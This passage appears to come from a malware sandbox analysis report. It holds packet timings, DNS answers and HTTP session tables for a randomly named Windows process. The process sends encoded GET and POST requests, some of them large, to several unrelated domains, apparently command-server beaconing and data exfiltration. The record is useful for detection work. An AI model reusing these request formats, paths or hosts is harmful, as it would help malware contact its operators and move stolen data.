                                                                                                Nov 11, 2024 17:03:52.178519964 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178550005 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178579092 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178607941 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178642988 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178658009 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.178675890 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178708076 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178733110 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.178736925 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:05:06.624998093 CET80498103.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.507282019 CET4981180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:07.642697096 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.642992020 CET4981180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:07.650649071 CET4981180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:07.650707960 CET4981180192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:07.785139084 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.785228968 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.785237074 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.785243988 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:07.785856962 CET80498113.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.178596020 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.314055920 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.314229965 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.319263935 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.453752995 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.454735994 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.454849005 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:10.455044031 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.456861973 CET4981280192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:10.593866110 CET80498123.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.474417925 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:15.721847057 CET8049813185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.722064972 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:15.729585886 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:15.976943016 CET8049813185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.977914095 CET8049813185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.978056908 CET8049813185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:15.978497028 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:17.237458944 CET4981380192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:18.254959106 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:18.502234936 CET8049814185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:18.502562046 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:18.510823011 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:18.758194923 CET8049814185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:18.758709908 CET8049814185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:18.758718014 CET8049814185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:18.758886099 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:20.018134117 CET4981480192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.037396908 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.284837008 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.285161972 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.301706076 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.301724911 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.301800013 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:21.549206018 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549213886 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549324036 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549330950 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549335957 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549340010 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549345016 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549880028 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.549981117 CET8049815185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:21.550136089 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:22.814404011 CET4981580192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:23.831818104 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.078856945 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.079042912 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.084741116 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.331734896 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332834005 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332942009 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332952023 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332959890 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332984924 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.332990885 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:24.333100080 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.333209991 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.335050106 CET4981680192.168.11.20185.68.16.94
                                                                                                Nov 11, 2024 17:05:24.582173109 CET8049816185.68.16.94192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.346343040 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:29.463574886 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.463795900 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:29.471441031 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:29.588624001 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.606569052 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.606605053 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.606623888 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.606739998 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:29.612642050 CET8049817199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:29.612848997 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:30.984494925 CET4981780192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.001952887 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.119400978 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.119637012 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.127116919 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.244615078 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.262219906 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.262269974 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.262303114 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.262543917 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.262644053 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:32.268872023 CET8049818199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:32.269006014 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:33.640173912 CET4981880192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.657573938 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.792717934 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.792905092 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.800620079 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.800676107 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.935236931 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935308933 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935338020 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935365915 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935899973 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.935949087 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.936016083 CET8049819199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:34.936233044 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:34.936347008 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:36.311486006 CET4981980192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.328867912 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.463659048 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:37.463915110 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.468961954 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.603640079 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:37.603722095 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:37.603729963 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:37.604290962 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.606120110 CET4982080192.168.11.20199.59.243.227
                                                                                                Nov 11, 2024 17:05:37.740185976 CET8049820199.59.243.227192.168.11.20
                                                                                                Nov 11, 2024 17:05:42.609203100 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:42.902559996 CET8049821192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:42.902822971 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:42.910332918 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:43.203495026 CET8049821192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:43.224169016 CET8049821192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:43.224210978 CET8049821192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:43.224319935 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:44.419076920 CET4982180192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:45.436471939 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:45.727025032 CET8049822192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:45.727241039 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:45.734800100 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:46.025398970 CET8049822192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:46.037164927 CET8049822192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:46.037308931 CET8049822192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:46.037534952 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:47.246578932 CET4982280192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.264134884 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.556248903 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.556432009 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.564104080 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.564162016 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:48.855928898 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.856076956 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.856173038 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.856184006 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.856307983 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.873466015 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.873541117 CET8049823192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:48.873740911 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:50.074129105 CET4982380192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.091495991 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.382091999 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:51.382229090 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.387305021 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.677902937 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:51.694986105 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:51.695099115 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:51.695303917 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.697108984 CET4982480192.168.11.20192.64.118.221
                                                                                                Nov 11, 2024 17:05:51.987821102 CET8049824192.64.118.221192.168.11.20
                                                                                                Nov 11, 2024 17:05:56.699819088 CET4982580192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:57.031641960 CET8049825154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:05:57.031928062 CET4982580192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:57.039556026 CET4982580192.168.11.20154.23.184.95
                                                                                                Nov 11, 2024 17:05:57.371431112 CET8049825154.23.184.95192.168.11.20
                                                                                                Nov 11, 2024 17:04:16.555360079 CET1.1.1.1192.168.11.200x71cdNo error (0)www.ergeneescortg.xyz104.21.56.13A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:16.555360079 CET1.1.1.1192.168.11.200x71cdNo error (0)www.ergeneescortg.xyz172.67.175.174A (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.170887947 CET9.9.9.9192.168.11.200x7104Name error (3)www.06753.photononenoneA (IP address)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.413805962 CET1.1.1.1192.168.11.200x7104No error (0)www.06753.photouaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.413805962 CET1.1.1.1192.168.11.200x7104No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Nov 11, 2024 17:04:31.413805962 CET1.1.1.1192.168.11.200x7104No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49746 | 85.159.66.93 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:01:00.784406900 CET | 502 | OUT | GET /lfgb/?IBQP=jffr1tZfViqyj73DU5WRWOY43I+aPG5WiS0/lZ85bfnIBTks24N0Lwiq54kt/mVxyQrAqrDAlkCB2A8imI95kp9/KC7Gc37tvCBE0Q7f/JyzR84blKaoE+c=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.kikaraofficial.xyz
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:01:01.043497086 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.14.1
                                                                                                Date: Mon, 11 Nov 2024 16:01:00 GMT
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                X-Rate-Limit-Limit: 5s
                                                                                                X-Rate-Limit-Remaining: 19
                                                                                                X-Rate-Limit-Reset: 2024-11-11T16:01:05.9195744Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49747 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:01:16.406161070 CET | 756 | OUT | POST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49748 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:01:19.075959921 CET | 776 | OUT | POST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49749 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:01:21.729159117 CET | 7734 | OUT | POST /o25q/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Origin: http://www.6686vi38.app
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.6686vi38.app/o25q/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49750 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:01:24.400902987 CET | 496 | OUT | GET /o25q/?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.6686vi38.app
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 11, 2024 17:01:24.536736012 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:01:24 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=QpTJ7m3GW2SBpTQ/pnZIOVyum6M1OOHCKcmmJS+2kX127Zipvsw4rzpvHWp8zcGwLINz6DxgnuQsGhwCDMmXcaGTyoRGQB215b5fyWnb/5ky0ky6NfbUSoQ=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49751 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:01:29.862476110 CET | 750 | OUT | POST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49752 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:01:32.507740021 CET | 770 | OUT | POST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49753 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:01:35.182434082 CET | 1289 | OUT | POST /bpf5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Origin: http://www.7fh27o.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.7fh27o.vip/bpf5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:01:35.182477951 CET | 1289 | OUT |
                                                                                                Data Ascii: YQPoEtsCyIsbSGmVh+JBQ/g8aeyoWZiDAEyLRGte/6ybLPM5oyLlYbe1a0haBE0U2qKUBfAn6WPgBOdhjNJ68jgcUIvlEPPb/VUO9KtsQZfiqqmZBWP1tHRVXwiG/OaXgBSotqZWSZsBcfquQybSazBiHJTVYbdnWXXEFHQucx60VSEHUlRlUo4L48wGj5KcUsqR8FoYoUPoqwEeEJy2mPUFCjaa3bxxAdetxVeOoydiBzi76uq
                                                                                                Nov 11, 2024 17:01:35.182528973 CET | 5341 | OUT |
                                                                                                Data Ascii: 7G41UE3RGSnV+25au5mNXBl0W3E+XPKyAvLxgHWZe6/3rd04TKt2//t8s1SC4WZt8on3hRrDdA0dQgDa9OACAfaTMC0JkWOK0FXyjhw8dJMsXp6ELMm1db32jSnvH5MunlSWR61YoOAbh7ZTOfXFmSH1x5wmEhsMKGA/TCZaDlcmhjsHHfdNrOV8t+ZE8do8fAzKDUURPnP99Yqw+qUqOYV3H3UsG02QB/J/d7eVKSMXetfKNQv


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                8 | 192.168.11.20 | 49754 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:01:37.832010031 CET | 494 | OUT | GET /bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
